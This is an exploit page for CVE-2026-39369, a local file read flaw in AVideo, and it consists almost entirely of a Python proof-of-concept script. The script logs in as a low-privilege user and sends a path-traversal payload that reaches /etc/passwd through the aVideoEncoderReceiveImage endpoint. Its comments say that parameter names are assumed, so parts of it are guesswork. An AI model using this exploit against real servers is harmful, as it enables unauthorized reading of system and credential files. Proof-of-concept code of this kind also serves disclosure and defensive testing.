CVE-2026-39369: AVideo本地文件读取漏洞

import requests # Proof of Concept for CVE-2026-39369 # Requires low-privileged user credentials target = "http://avideo-target.com" login_url = f"{target}/objects/userLogin.json.php" vuln_url = f"{target}/objects/aVideoEncoderReceiveImage.json.php" # 1. Authenticate as a low-privilege user credentials = {"user": "attacker", "pass": "password"} session = requests.Session() session.post(login_url, data=credentials) # 2. Exploit Path Traversal via aVideoEncoderReceiveImage # The endpoint accepts a path, we use traversal to reach /etc/passwd # Assuming the parameter name is 'file' or 'videoURL' based on common patterns payload = { "videoURL": "/videos/../../../../../etc/passwd", # The path is prepended with /videos/ internally, so we traverse up } response = session.post(vuln_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the returned URL for the GIF containing file contents.") # The server might return a JSON with the path to the generated GIF # e.g. response.json()['url'] print(f"Response: {response.text}") else: print("[-] Exploit failed.")